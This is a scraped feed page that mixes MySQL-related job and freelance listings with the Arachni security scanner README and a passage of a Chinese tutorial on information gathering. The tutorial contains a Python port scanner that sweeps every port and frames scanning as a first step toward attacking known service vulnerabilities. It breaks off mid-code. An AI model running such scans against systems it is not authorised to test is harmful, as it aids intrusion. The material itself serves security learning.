Need an Advisor for IT Firm on project basis, to work and complete the given task and advise regulary Need php,mysql,woocommerce,codecanyon,androd app, designing, etc i cant pay much, so if u can work... (Budget: ₹1500 - ₹12500 INR, Jobs: HTML, MySQL, PHP, Website Design, WordPress)
          Fix a Broken Wordpress Website      Cache   Translate Page   Web Page Cache   
Hello. I recently moved hosting companies and my wordpress website is now broken after i have moved to a new hosting provided. I can provide you the backup of the website and database. I have tried to get the website to work but all i get is an HTTP Error 500... (Budget: $30 - $250 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          לחברת Hackeru הבינלאומית דרוש/ה מרצה לפיתוח אפליקציות Android ו-iOS      Cache   Translate Page   Web Page Cache   
לחברת Hackeru המובילה בתחום לימודי ההייטק דרוש/ה מרצה לפיתוח אפליקציות Android וiOS עם התמחות מקיפה ב- Server ו- Client.דרישותניסיון בפיתוח אפליקציות - חובה.ניסיון בהדרכה - חובה.ניסיון קודם בתפקיד דומה או זהה - יתרון.נדרשת בקיאות ברמת הדרכה:פיתוח אפליקציות בiOS HTML וHTML5CSS3.0NET.JavaScriptBootstrap, jQuery,JSAngularMySQLJavaSwift
          新卒1期生!エンジニアの皆さん、1発面接であなたの全て出し切ってください! by 株式会社スターファクトリー      Cache   Translate Page   Web Page Cache   
4年目を迎えたスターファクトリーですが、ようやく、新しい仲間を迎え入れる準備が整いました! 現在デザイナー1名、クライアントプログラマー1名の入社が確定しています。 19卒のエンジニア志望の皆さん、3人目の新卒1期生として弊社で活躍しませんか? ーーーーーー 先輩たちは長年ゲーム業界にいた手練れ達ばかりです。 間違いなく成長できる環境がここにはあります。 縦割りで狭い仕事範囲ではなく、ベンチャーだからこそのスピード感と大きな裁量をもって仕事をすることが可能です。 それは決して任せきりといったことではありません。 助けてと言えば必ず手を差し伸べてくれる、そしてそんな声を上げやすい空気がきちんと社内に出来上がっています。 何より大事なのは成長したいという思いです。 平均年齢36歳と、ベンチャーでありながら年齢の逆ピラミッド現象が起こっている弊社にぜひフレッシュな風を吹かせて下さい! 世の中をワクワクさせるようなキラッと輝く作品を一緒に創りましょう! なお弊社の面接は1回のみ! そこであなたの全てを出し切ってください! ※facebookページ https://www.facebook.com/starfactory.inc.inc/ 【求める人物像】 ・チームプレイが好きな方! ・楽しいことが好きな方! ・ぐんぐん成長したい方! ・内定後、可能であれば弊社でアルバイトができる方! 【職務内容】 ★サーバーサイドエンジニア ・オンラインサービスのサーバサイド開発、設計 ・オンラインサービスのインフラ設計、構築、運用 ・パフォーマンスチューニング ★クライアントプログラマー ・ゲームクライアントの設計・開発 ・ツール、ライブラリ、フレームワークの設計・開発 ・開発環境の設計・構築 【開発環境・言語】 ・サーバサイド: JavaScript、Node.js、MySQL、Redis ・クラウドサービス: Amazon Web Services (AWS) ・ゲームクライアント: C#、C++、Swift、Java ・ゲームエンジン: Unity ・ソースコード管理: GitHub ・チャット: Slack
          英語×インフラ!Avintonの中核を支えてくれるエンジニアWanted! by Avintonジャパン株式会社      Cache   Translate Page   Web Page Cache   
【グローバルな環境でシステムの土台を守り、改善していく貴重なポジションで仲間を募集しています。】 今回は自社ソリューションのビッグデータ解析ツールをはじめ、機械学習のプログラムを動かしているインフラシステムの障害解析から復旧までを一貫してエンジニアとして担当いただきます。 様々な技術で構成された、最新のソリューションを理解する過程で幅広い技術を身に着けていただくことが可能です。 ♢こんな方にピッタリ♢ ・サーバ、ネットワーク問わずインフラの業務経験のある方 ・テクニカルサポート経験のある方 ・Oracle/Linux/MySQLの使用経験のある方 ・英語に抵抗のない方 メンバーにはイギリス、ハンガリーなど多国籍なメンバーが在籍しており一人ひとりの裁量も大きく成長できる環境が整っています。 興味のある方は是非「話を聞きに行きたい」から ご応募ください。 皆様からのご応募お待ちしています♪
          OK, dumb but. how do you pronounce MySQL?      Cache   Translate Page   Web Page Cache   
none
          Downgrade mysql 5.7.21 to 5.5.53 advisable?      Cache   Translate Page   Web Page Cache   
none
          MySQL or MariaDB or PostgreSQL?      Cache   Translate Page   Web Page Cache   
none
          mySQL column limit      Cache   Translate Page   Web Page Cache   
max number / size
          PHP Developer (Tamil Nadu)      Cache   Translate Page   Web Page Cache   
PTC - Aviation Academy - Date posted: 11 Jul 2018
We require a  PHP Developer for an upcoming Web Development Company   Job Profile Integration of user-facing elements developed by front-end developers. Solve complex performance problems and architectural challenges Requirements Should have an experience of between 2+ years in PHP with strong hand in MVC Concept Must have knowledge in CodeIgniter Framework. Magento, Joomla, WordPress Preferred Good knowledge in MYSQL Database. Experience of developing and maintaining dynamic websites. Working knowledge of front end technologies like HTML5, CSS3, and JavaScript/j Query. Salary Rs.15,000 to Rs.20,000   Location Chennai (Anna Nagar)   Day Shift...
          PHP Developer      Cache   Translate Page   Web Page Cache   
Evaluate Solution Services - Mohali, Punjab - Chandigarh - Dear candidate, Job Title: Sr Php Developer Functional Area :|IT Software | Software Products & Services| Specializations :||UI.... Should have minimum 3 years experience in PHP with strong hand in Core PHP, MVC frameworks, Cake PHP, Codeigniter. Should be having good experience with MySQL...
          Full Stack React/Node developer      Cache   Translate Page   Web Page Cache   
Hi. I am a developer as well. And currently, I have several projects running now so that I cannot handle more. So my one of clients want to hire someone else who can take over the project and work with me closely... (Budget: $3000 - $5000 USD, Jobs: Angular.js, MySQL, node.js, PHP, React.js)
          Project for Azad V.      Cache   Translate Page   Web Page Cache   
Hi Azad V., I noticed your profile and would like to offer you my project. We can discuss any details over chat. (Budget: €170 EUR, Jobs: Hire me, HTML, Javascript, MySQL, PHP, WordPress)
          Full Stack React/Node developer      Cache   Translate Page   Web Page Cache   
Hi. I am a developer as well. And currently, I have several projects running now so that I cannot handle more. So my one of clients want to hire someone else who can take over the project and work with me closely... (Budget: $3000 - $5000 USD, Jobs: Angular.js, MySQL, node.js, PHP, React.js)
          Project for Azad V.      Cache   Translate Page   Web Page Cache   
Hi Azad V., I noticed your profile and would like to offer you my project. We can discuss any details over chat. (Budget: €170 EUR, Jobs: Hire me, HTML, Javascript, MySQL, PHP, WordPress)
          Desarrollador Java Full-Stack - STEL Solutions - Murcia, España      Cache   Translate Page   Web Page Cache   
Buscamos talento para incorporarse al equipo de desarrollo del producto estrella de la compañía. Se trata de STEL Order (www.stelorder.com), el software de gestión y facturación en la nube y en el móvil mejor valorado. Requisitos: Experiencia desarrollando sistemas de back-end con Java J2EE y Apache Tomcat. Experiencia trabajando con servidores de base de datos (MySQL y JPA) Experiencia desarrollando front-end para aplicaciones web (HTML, CSS, JavaScript, JQuery y AJAX). ...
          Magento Developer - (Magento/PHP7)      Cache   Translate Page   Web Page Cache   
MA-Boston, If you are a Magento Developer looking for a new job opportunity, read on! We are an ecommerce company based in Somerville, and we have one of the sharpest teams around! Currently we are looking for a Software Engineer who has worked with the most recent versions of Magento and PHP, while also working with Laravel and MySQL. Apply now! What You Need for this Position At Least 3 Years of experience
          PROBLEMA CON MYSQL      Cache   Translate Page   Web Page Cache   
Buongiorno , ho un problema con il mio sito , mi appare questa scritta : Fatal error: Call to undefined method _WP_Editors::enqueue_default_editor() in /var/www/vhosts/nauticashark.it/httpdocs/wp-includes/general-template.php on line 3115 che posso fare?
          Intro to Databases (MySQL, CloudKit, Firebase, Core Data, Realm)      Cache   Translate Page   Web Page Cache   
Get an intro to popular database options used for iOS app development like MySQL, CloudKit, Firebase, Core Data and Realm. Quick Jump Links 00:28 – MySQL 05:16 – CloudKit 10:49 – Firebase Database 13:45 – Core Data 17:20 – Realm Database Come and learn iOS programming with us! If you want to increase your chances […]
          need andriod and php developer      Cache   Translate Page   Web Page Cache   
need andriod and php developer for my app & site (Budget: ₹600 - ₹1500 INR, Jobs: Android, iPhone, Mobile App Development, MySQL, PHP)
          Commission free and mobile friendly online booking system and channel manager for hotels      Cache   Translate Page   Web Page Cache   
I am looking for a application like beds24.com. web app has to be identical & should have features exactly similar to beds24.com. Please wright carefully https://wiki.beds24.com before your bid!!!I am... (Budget: €250 - €750 EUR, Jobs: CSS, HTML, Javascript, MySQL, PHP)
          Create a war type of project from a given online tutorial example - and make it work with tomcat and on browser.      Cache   Translate Page   Web Page Cache   
Hi, this is for educational purpose, We would like to create a WAR type project from a RESTful server from the following example: https://www.concretepage.com/spring-boot/spring-boot-security-rest-jpa-hibernate-mysql-crud-example... (Budget: $10 - $20 AUD, Jobs: J2EE, Java, Linux, MySQL, node.js)
          need andriod and php developer      Cache   Translate Page   Web Page Cache   
need andriod and php developer for my app & site (Budget: ₹600 - ₹1500 INR, Jobs: Android, iPhone, Mobile App Development, MySQL, PHP)
          Commission free and mobile friendly online booking system and channel manager for hotels      Cache   Translate Page   Web Page Cache   
I am looking for a application like beds24.com. web app has to be identical & should have features exactly similar to beds24.com. Please wright carefully https://wiki.beds24.com before your bid!!!I am... (Budget: €250 - €750 EUR, Jobs: CSS, HTML, Javascript, MySQL, PHP)
          GitHub - Arachni/arachni: Web Application Security Scanner Framework      Cache   Translate Page   Web Page Cache   

README.md

Arachni logo

Synopsis

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

Note: Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc. with the addition of custom components.

Arachni offers:

A stable, efficient, high-performance framework

Check, report and plugin developers are allowed to easily and quickly create and deploy their components with the minimum amount of restrictions imposed upon them, while provided with the necessary infrastructure to accomplish their goals.

Furthermore, they are encouraged to take full advantage of the Ruby language under a unified framework that will increase their productivity without stifling them or complicating their tasks.

Moreover, that same framework can be utilized as any other Ruby library and lead to the development of brand new scanners or help you create highly customized scan/audit scenarios and/or scripted scans.

Simplicity

Although some parts of the Framework are fairly complex you will never have to deal them directly. From a user’s or a component developer’s point of view everything appears simple and straight-forward all the while providing power, performance and flexibility.

From the simple command-line utility scanner to the intuitive and user-friendly Web interface and collaboration platform, Arachni follows the principle of least surprise and provides you with plenty of feedback and guidance.

In simple terms

Arachni is designed to automatically detect security issues in web applications. All it expects is the URL of the target website and after a while it will present you with its findings.

Features

General

  • Cookie-jar/cookie-string support.
  • Custom header support.
  • SSL support with fine-grained options.
  • User Agent spoofing.
  • Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
  • Proxy authentication.
  • Site authentication (SSL-based, form-based, Cookie-Jar, Basic-Digest, NTLMv1, Kerberos and others).
  • Automatic log-out detection and re-login during the scan (when the initial login was performed via the autologin, login_script or proxy plugins).
  • Custom 404 page detection.
  • UI abstraction:
  • Pause/resume functionality.
  • Hibernation support -- Suspend to and restore from disk.
  • High performance asynchronous HTTP requests.
    • With adjustable concurrency.
    • With the ability to auto-detect server health and adjust its concurrency automatically.
  • Support for custom default input values, using pairs of patterns (to be matched against input names) and values to be used to fill in matching inputs.

Integrated browser environment

Arachni includes an integrated, real browser environment in order to provide sufficient coverage to modern web applications which make use of technologies such as HTML5, JavaScript, DOM manipulation, AJAX, etc.

In addition to the monitoring of the vanilla DOM and JavaScript environments, Arachni's browsers also hook into popular frameworks to make the logged data easier to digest:

In essence, this turns Arachni into a DOM and JavaScript debugger, allowing it to monitor DOM events and JavaScript data and execution flows. As a result, not only can the system trigger and identify DOM-based issues, but it will accompany them with a great deal of information regarding the state of the page at the time.

Relevant information include:

  • Page DOM, as HTML code.
    • With a list of DOM transitions required to restore the state of the page to the one at the time it was logged.
  • Original DOM (i.e. prior to the action that caused the page to be logged), as HTML code.
    • With a list of DOM transitions.
  • Data-flow sinks -- Each sink is a JS method which received a tainted argument.
    • Parent object of the method (ex.: DOMWindow).
    • Method signature (ex.: decodeURIComponent()).
    • Arguments list.
      • With the identified taint located recursively in the included objects.
    • Method source code.
    • JS stacktrace.
  • Execution flow sinks -- Each sink is a successfully executed JS payload, as injected by the security checks.
    • Includes a JS stacktrace.
  • JavaScript stack-traces include:
    • Method names.
    • Method locations.
    • Method source codes.
    • Argument lists.

In essence, you have access to roughly the same information that your favorite debugger (for example, FireBug) would provide, as if you had set a breakpoint to take place at the right time for identifying an issue.

Browser-cluster

The browser-cluster is what coordinates the browser analysis of resources and allows the system to perform operations which would normally be quite time consuming in a high-performance fashion.

Configuration options include:

  • Adjustable pool-size, i.e. the amount of browser workers to utilize.
  • Timeout for each job.
  • Worker TTL counted in jobs -- Workers which exceed the TTL have their browser process respawned.
  • Ability to disable loading images.
  • Adjustable screen width and height.
    • Can be used to analyze responsive and mobile applications.
  • Ability to wait until certain elements appear in the page.
  • Configurable local storage data.

Coverage

The system can provide great coverage to modern web applications due to its integrated browser environment. This allows it to interact with complex applications that make heavy use of client-side code (like JavaScript) just like a human would.

In addition to that, it also knows about which browser state changes the application has been programmed to handle and is able to trigger them programatically in order to provide coverage for a full set of possible scenarios.

By inspecting all possible pages and their states (when using client-side code) Arachni is able to extract and audit the following elements and their inputs:

  • Forms
    • Along with ones that require interaction via a real browser due to DOM events.
  • User-interface Forms
    • Input and button groups which don't belong to an HTML <form> element but are instead associated via JS code.
  • User-interface Inputs
    • Orphan <input> elements with associated DOM events.
  • Links
    • Along with ones that have client-side parameters in their fragment, i.e.: http://example.com/#/?param=val&param2=val2
    • With support for rewrite rules.
  • LinkTemplates -- Allowing for extraction of arbitrary inputs from generic paths, based on user-supplied templates -- useful when rewrite rules are not available.
    • Along with ones that have client-side parameters in their URL fragments, i.e.: http://example.com/#/param/val/param2/val2
  • Cookies
  • Headers
  • Generic client-side elements which have associated DOM events.
  • AJAX-request parameters.
  • JSON request data.
  • XML request data.

Open distributed architecture

Arachni is designed to fit into your workflow and easily integrate with your existing infrastructure.

Depending on the level of control you require over the process, you can either choose the REST service or the custom RPC protocol.

Both approaches allow you to:

  • Remotely monitor and manage scans.
  • Perform multiple scans at the same time -- Each scan is compartmentalized to its own OS process to take advantage of:
    • Multi-core/SMP architectures.
    • OS-level scheduling/restrictions.
    • Sandboxed failure propagation.
  • Communicate over a secure channel.

REST API

  • Very simple and straightforward API.
  • Easy interoperability with non-Ruby systems.
    • Operates over HTTP.
    • Uses JSON to format messages.
  • Stateful scan monitoring.
    • Unique sessions automatically only receive updates when polling for progress, rather than full data.

RPC API

  • High-performance/low-bandwidth communication protocol.
    • MessagePack serialization for performance, efficiency and ease of integration with 3rd party systems.
  • Grid:
    • Self-healing.
    • Scale up/down by hot-plugging/hot-unplugging nodes.
      • Can scale up infinitely by adding nodes to increase scan capacity.
    • (Always-on) Load-balancing -- All Instances are automatically provided by the least burdened Grid member.
      • With optional per-scan opt-out/override.
    • (Optional) High-Performance mode -- Combines the resources of multiple nodes to perform multi-Instance scans.
      • Enabled on a per-scan basis.

Scope configuration

  • Filters for redundant pages like galleries, catalogs, etc. based on regular expressions and counters.
    • Can optionally detect and ignore redundant pages automatically.
  • URL exclusion filters using regular expressions.
  • Page exclusion filters based on content, using regular expressions.
  • URL inclusion filters using regular expressions.
  • Can be forced to only follow HTTPS paths and not downgrade to HTTP.
  • Can optionally follow subdomains.
  • Adjustable page count limit.
  • Adjustable redirect limit.
  • Adjustable directory depth limit.
  • Adjustable DOM depth limit.
  • Adjustment using URL-rewrite rules.
  • Can read paths from multiple user supplied files (to both restrict and extend the scope).

Audit

  • Can audit:
    • Forms
      • Can automatically refresh nonce tokens.
      • Can submit them via the integrated browser environment.
    • User-interface Forms
      • Input and button groups which don't belong to an HTML <form> element but are instead associated via JS code.
    • User-interface Inputs
      • Orphan <input> elements with associated DOM events.
    • Links
      • Can load them via the integrated browser environment.
    • LinkTemplates
      • Can load them via the integrated browser environment.
    • Cookies
      • Can load them via the integrated browser environment.
    • Headers
    • Generic client-side DOM elements.
    • JSON request data.
    • XML request data.
  • Can ignore binary/non-text pages.
  • Can audit elements using both GET and POST HTTP methods.
  • Can inject both raw and HTTP encoded payloads.
  • Can submit all links and forms of the page along with the cookie permutations to provide extensive cookie-audit coverage.
  • Can exclude specific input vectors by name.
  • Can include specific input vectors by name.

Components

Arachni is a highly modular system, employing several components of distinct types to perform its duties.

In addition to enabling or disabling the bundled components so as to adjust the system's behavior and features as needed, functionality can be extended via the addition of user-created components to suit almost every need.

Platform fingerprinters

In order to make efficient use of the available bandwidth, Arachni performs rudimentary platform fingerprinting and tailors the audit process to the server-side deployed technologies by only using applicable payloads.

Currently, the following platforms can be identified:

  • Operating systems
    • BSD
    • Linux
    • Unix
    • Windows
    • Solaris
  • Web servers
    • Apache
    • IIS
    • Nginx
    • Tomcat
    • Jetty
    • Gunicorn
  • Programming languages
    • PHP
    • ASP
    • ASPX
    • Java
    • Python
    • Ruby
  • Frameworks
    • Rack
    • CakePHP
    • Rails
    • Django
    • ASP.NET MVC
    • JSF
    • CherryPy
    • Nette
    • Symfony

The user also has the option of specifying extra platforms (like a DB server) in order to help the system be as efficient as possible. Alternatively, fingerprinting can be disabled altogether.

Finally, Arachni will always err on the side of caution and send all available payloads when it fails to identify specific platforms.

Checks

Checks are system components which perform security checks and log issues.

Active

Active checks engage the web application via its inputs.

  • SQL injection (sql_injection) -- Error based detection.
    • Oracle
    • InterBase
    • PostgreSQL
    • MySQL
    • MSSQL
    • EMC
    • SQLite
    • DB2
    • Informix
    • Firebird
    • SaP Max DB
    • Sybase
    • Frontbase
    • Ingres
    • HSQLDB
    • MS Access
  • Blind SQL injection using differential analysis (sql_injection_differential).
  • Blind SQL injection using timing attacks (sql_injection_timing).
    • MySQL
    • PostgreSQL
    • MSSQL
  • NoSQL injection (no_sql_injection) -- Error based vulnerability detection.
  • Blind NoSQL injection using differential analysis (no_sql_injection_differential).
  • CSRF detection (csrf).
  • Code injection (code_injection).
    • PHP
    • Ruby
    • Python
    • Java
    • ASP
  • Blind code injection using timing attacks (code_injection_timing).
    • PHP
    • Ruby
    • Python
    • Java
    • ASP
  • LDAP injection (ldap_injection).
  • Path traversal (path_traversal).
    • *nix
    • Windows
    • Java
  • File inclusion (file_inclusion).
    • *nix
    • Windows
    • Java
    • PHP
    • Perl
  • Response splitting (response_splitting).
  • OS command injection (os_cmd_injection).
    • *nix
    • *BSD
    • IBM AIX
    • Windows
  • Blind OS command injection using timing attacks (os_cmd_injection_timing).
    • Linux
    • *BSD
    • Solaris
    • Windows
  • Remote file inclusion (rfi).
  • Unvalidated redirects (unvalidated_redirect).
  • Unvalidated DOM redirects (unvalidated_redirect_dom).
  • XPath injection (xpath_injection).
    • Generic
    • PHP
    • Java
    • dotNET
    • libXML2
  • XSS (xss).
  • Path XSS (xss_path).
  • XSS in event attributes of HTML elements (xss_event).
  • XSS in HTML tags (xss_tag).
  • XSS in script context (xss_script_context).
  • DOM XSS (xss_dom).
  • DOM XSS script context (xss_dom_script_context).
  • Source code disclosure (source_code_disclosure)
  • XML External Entity (xxe).
    • Linux
    • *BSD
    • Solaris
    • Windows
Passive

Passive checks look for the existence of files, folders and signatures.

  • Allowed HTTP methods (allowed_methods).
  • Back-up files (backup_files).
  • Backup directories (backup_directories)
  • Common administration interfaces (common_admin_interfaces).
  • Common directories (common_directories).
  • Common files (common_files).
  • HTTP PUT (http_put).
  • Insufficient Transport Layer Protection for password forms (unencrypted_password_form).
  • WebDAV detection (webdav).
  • HTTP TRACE detection (xst).
  • Credit Card number disclosure (credit_card).
  • CVS/SVN user disclosure (cvs_svn_users).
  • Private IP address disclosure (private_ip).
  • Common backdoors (backdoors).
  • .htaccess LIMIT misconfiguration (htaccess_limit).
  • Interesting responses (interesting_responses).
  • HTML object grepper (html_objects).
  • E-mail address disclosure (emails).
  • US Social Security Number disclosure (ssn).
  • Forceful directory listing (directory_listing).
  • Mixed Resource/Scripting (mixed_resource).
  • Insecure cookies (insecure_cookies).
  • HttpOnly cookies (http_only_cookies).
  • Auto-complete for password form fields (password_autocomplete).
  • Origin Spoof Access Restriction Bypass (origin_spoof_access_restriction_bypass)
  • Form-based upload (form_upload)
  • localstart.asp (localstart_asp)
  • Cookie set for parent domain (cookie_set_for_parent_domain)
  • Missing Strict-Transport-Security headers for HTTPS sites (hsts).
  • Missing X-Frame-Options headers (x_frame_options).
  • Insecure CORS policy (insecure_cors_policy).
  • Insecure cross-domain policy (allow-access-from) (insecure_cross_domain_policy_access)
  • Insecure cross-domain policy (allow-http-request-headers-from) (insecure_cross_domain_policy_headers)
  • Insecure client-access policy (insecure_client_access_policy)

Reporters

Plugins

Plugins add extra functionality to the system in a modular fashion, this way the core remains lean and makes it easy for anyone to add arbitrary functionality.

  • Passive Proxy (proxy) -- Analyzes requests and responses between the web app and the browser assisting in AJAX audits, logging-in and/or restricting the scope of the audit.
  • Form based login (autologin).
  • Script based login (login_script).
  • Dictionary attacker for HTTP Auth (http_dicattack).
  • Dictionary attacker for form based authentication (form_dicattack).
  • Cookie collector (cookie_collector) -- Keeps track of cookies while establishing a timeline of changes.
  • WAF (Web Application Firewall) Detector (waf_detector) -- Establishes a baseline of normal behavior and uses rDiff analysis to determine if malicious inputs cause any behavioral changes.
  • BeepNotify (beep_notify) -- Beeps when the scan finishes.
  • EmailNotify (email_notify) -- Sends a notification (and optionally a report) over SMTP at the end of the scan.
  • VectorFeed (vector_feed) -- Reads in vector data from which it creates elements to be audited. Can be used to perform extremely specialized/narrow audits on a per vector/element basis. Useful for unit-testing or a gazillion other things.
  • Script (script) -- Loads and runs an external Ruby script under the scope of a plugin, used for debugging and general hackery.
  • Uncommon headers (uncommon_headers) -- Logs uncommon headers.
  • Content-types (content_types) -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files.
  • Vector collector (vector_collector) -- Collects information about all seen input vectors which are within the scan scope.
  • Headers collector (headers_collector) -- Collects response headers based on specified criteria.
  • Exec (exec) -- Calls external executables at different scan stages.
  • Metrics (metrics) -- Captures metrics about multiple aspects of the scan and the web application.
  • Restrict to DOM state (restrict_to_dom_state) -- Restricts the audit to a single page's DOM state, based on a URL fragment.
  • Webhook notify (webhook_notify) -- Sends a webhook payload over HTTP at the end of the scan.
  • Rate limiter (rate_limiter) -- Rate limits HTTP requests.
  • Page dump (page_dump) -- Dumps page data to disk as YAML.
Defaults

Default plugins will run for every scan and are placed under /plugins/defaults/.

  • AutoThrottle (autothrottle) -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • Healthmap (healthmap) -- Generates sitemap showing the health of each crawled/audited URL
Meta

Plugins under /plugins/defaults/meta/ perform analysis on the scan results to determine trustworthiness or just add context information or general insights.

  • TimingAttacks (timing_attacks) -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS attacks against pages that perform heavy-duty processing.
  • Discovery (discovery) -- Performs anomaly detection on issues logged by discovery checks and warns of the possibility of false positives where applicable.
  • Uniformity (uniformity) -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.

Trainer subsystem

The Trainer is what enables Arachni to learn from the scan it performs and incorporate that knowledge, on the fly, for the duration of the audit.

Checks have the ability to individually force the Framework to learn from the HTTP responses they are going to induce.

However, this is usually not required since Arachni is aware of which requests are more likely to uncover new elements or attack vectors and will adapt itself accordingly.

Still, this can be an invaluable asset to Fuzzer checks.

Running the specs

You can run rake spec to run all specs or you can run them selectively using the following:

rake spec:core            # for the core libraries
rake spec:checks          # for the checks
rake spec:plugins         # for the plugins
rake spec:reports         # for the reports
rake spec:path_extractors # for the path extractors

Please be warned, the core specs will require a beast of a machine due to the necessity to test the Grid/multi-Instance features of the system.

Note: The check specs will take many hours to complete due to the timing-attack tests.

Bug reports/Feature requests

Submit bugs using GitHub Issues and get support via the Support Portal.

Contributing

(Before starting any work, please read the instructions for working with the source code.)

We're happy to accept help from fellow code-monkeys and these are the steps you need to follow in order to contribute code:

  • Fork the project.
  • Start a feature branch based on the experimental branch (git checkout -b <feature-name> experimental).
  • Add specs for your code.
  • Run the spec suite to make sure you didn't break anything (rake spec:core for the core libs or rake spec for everything).
  • Commit and push your changes.
  • Issue a pull request and wait for your code to be reviewed.

License

Arachni Public Source License v1.0 -- please see the LICENSE file for more information.


          Create a war type of project from a given online tutorial example - and make it work with tomcat and on browser.      Cache   Translate Page   Web Page Cache   
Hi, this is for educational purpose, We would like to create a WAR type project from a RESTful server from the following example: https://www.concretepage.com/spring-boot/spring-boot-security-rest-jpa-hibernate-mysql-crud-example... (Budget: $10 - $20 AUD, Jobs: J2EE, Java, Linux, MySQL, node.js)
          Python大法之告别脚本小子系列---信息资产收集类脚本编写(上)      Cache   Translate Page   Web Page Cache   
本文原创作者:阿甫哥哥,本文属i春秋原创奖励计划,未经许可禁止转载
image
0x01 前言
在采集到URL之后,要做的就是对目标进行信息资产收集了,收集的越好,你挖到洞也就越多了............当然这一切的前提,就是要有耐心了!!!由于要写工具较多,SO,我会分两部分写......
0x02 端口扫描脚本编写

image
端口扫描的原理:
端口扫描,顾名思义,就是逐个对一段端口或指定的端口进行扫描。通过扫描结果可以知道一台计算机上都提供了哪些服务,然后就可以通过所提供的这些服务的己知漏洞就可进行攻击。其原理是当一个主机向远端一个服务器的某一个端口提出建立一个连接的请求,如果对方有此项服务,就会应答,如果对方未安装此项服务时,即使你向相应的端口发出请求,对方仍无应答,利用这个原理,如果对所有熟知端口或自己选定的某个范围内的熟知端口分别建立连接,并记录下远端服务器所给予的应答,通过查看一记录就可以知道目标服务器上都安装了哪些服务,这就是端口扫描,通过端口扫描,就可以搜集到很多关于目标主机的各种很有参考价值的信息。例如,对方是否提供FPT服务、WWW服务或其它服务。

代理服务器还有很多常用的端口
比如HTTP协议常用的就是:80/8080/3128/8081/9080,FTP协议常用的就是:21,Telnet协议常用的是23等等
来个较全的...
[AppleScript] 纯文本查看 复制代码
代理服务器常用以下端口:
⑴. HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080
⑵. SOCKS代理协议服务器常用端口号:1080
⑶. FTP(文件传输)协议代理服务器常用端口号:21
⑷. Telnet(远程登录)协议代理服务器常用端口:23
HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口);
HTTPS(securely transferring web pages)服务器,默认的端口号为443/tcp 443/udp;
Telnet(不安全的文本传送),默认端口号为23/tcp(木马Tiny Telnet Server所开放的端口);
FTP,默认的端口号为21/tcp(木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口);
TFTP(Trivial File Transfer Protocol),默认的端口号为69/udp;
SSH(安全登录)、SCP(文件传输)、端口重定向,默认的端口号为22/tcp;
SMTP Simple Mail Transfer Protocol (E-mail),默认的端口号为25/tcp(木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口);
POP3 Post Office Protocol (E-mail) ,默认的端口号为110/tcp;
WebLogic,默认的端口号为7001;
Webshpere应用程序,默认的端口号为9080;
webshpere管理工具,默认的端口号为9090;
JBOSS,默认的端口号为8080;
TOMCAT,默认的端口号为8080;
WIN2003远程登陆,默认的端口号为3389;
Symantec AV/Filter for MSE,默认端口号为 8081;
Oracle 数据库,默认的端口号为1521;
ORACLE EMCTL,默认的端口号为1158;
Oracle XDB(XML 数据库),默认的端口号为8080;
Oracle XDB FTP服务,默认的端口号为2100;
MS SQL*SERVER数据库server,默认的端口号为1433/tcp 1433/udp;
MS SQL*SERVER数据库monitor,默认的端口号为1434/tcp 1434/udp;
QQ,默认的端口号为1080/udp
等等,更具体的去百度吧,啊哈哈

端口的三种状态
OPEN  --端口是开放的,可以访问,有进程
CLOSED  --端口不会返回任何东西..可能有waf
FILTERED  --可以访问,但是没有程序监听

这里用一个工具--nmap举下栗子吧...
[AppleScript] 纯文本查看 复制代码
C:\Users\Administrator>nmap -sV localhost
Starting Nmap 7.70 ( [url]https://nmap.org[/url] ) at 2018-07-03 17:10 ?D1ú±ê×?ê±??
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00053s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 990 closed ports
PORT      STATE SERVICE           VERSION
80/tcp    open  http              Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
135/tcp   open  msrpc             Microsoft Windows RPC
443/tcp   open  ssl/https         VMware Workstation SOAP API 14.1.1
445/tcp   open  microsoft-ds      Microsoft Windows 7 - 10 microsoft-ds (workgroup: WorkGroup)
903/tcp   open  ssl/vmware-auth   VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
1080/tcp  open  http-proxy        Polipo
3306/tcp  open  mysql             MySQL 5.5.53
8088/tcp  open  radan-http?
10000/tcp open  snet-sensor-mgmt?
65000/tcp open  tcpwrapped

说的差不多了,咱们开始用Python实现它....端口扫描在Python中可以用的模块有很多,本文用socket模块演示单线程的在之前的文章有说过,具体传送门:
一个精壮的代购骗子被我彻底征服
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import socket
 
def Get_ip(domain):  
    try:  
        return socket.gethostbyname(domain)  
    except socket.error,e:  
        print '%s: %s'%(domain,e)  
        return 0 
 
def PortScan(ip):
    result_list=list()
    port_list=range(1,65535)
    for port in port_list:
        try:
            s=socket.socket() 
            s.settimeout(0.1)
            s.connect((ip,port))
            openstr= " PORT:"+str(port) +" OPEN "
            print openstr
            result_list.append(port)
            s.close()
        except:
            pass
    print result_list
def main():
